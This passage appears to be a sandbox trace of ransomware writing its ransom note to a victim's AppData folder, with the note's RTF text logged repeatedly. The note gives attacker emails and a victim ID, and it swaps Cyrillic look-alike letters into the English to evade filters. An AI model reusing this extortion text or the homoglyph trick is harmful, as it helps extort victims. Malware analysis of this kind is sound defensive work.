lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.684] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¤#9#,&«\x1e­\x8c…?4kP@<õL\x88f#Öã\x9b\x1d\x8e\x8c¥Ù\x09,Z/µ×jd0\x88\x9d]8ÏgNFâ.Ä4ìïÎ1ð£\x0bkzsµ³[÷\x96\x1d\x0eÖ\x97\x8d\x07q?G\x16~\x03\x13\x88ª#C6ôaK=\x96\x0f%ǨæúpW¼\x88²pµ´ò{Îî(sÛ\x1cC\x01þáý\x9aYf}\x1e\x13£1/ø¡r$oÛ\x03Û/¤ê\x83\x0b{¸zu\x9c%2±VX*P\x1dZ\x95´Ñ-\x835\x8c\x8a¶ \"èÃÐì'\n\x91\x9ee<\rÜ.ß0©Ö\x18ù\x1b!o\x8aͶ\x1a\x1cnô\x04\x80´*+¯~ÐJ9*à²9+|¨ð\x1eò\x98Ó\x0b", lpUsedDefaultChar=0x0) returned 7247 [0067.684] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0067.686] CloseHandle (hObject=0x1bc) returned 1 [0067.687] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bg85_info.rtf")) returned 0xffffffff [0067.687] GetLastError () returned 0x2 [0067.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0067.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 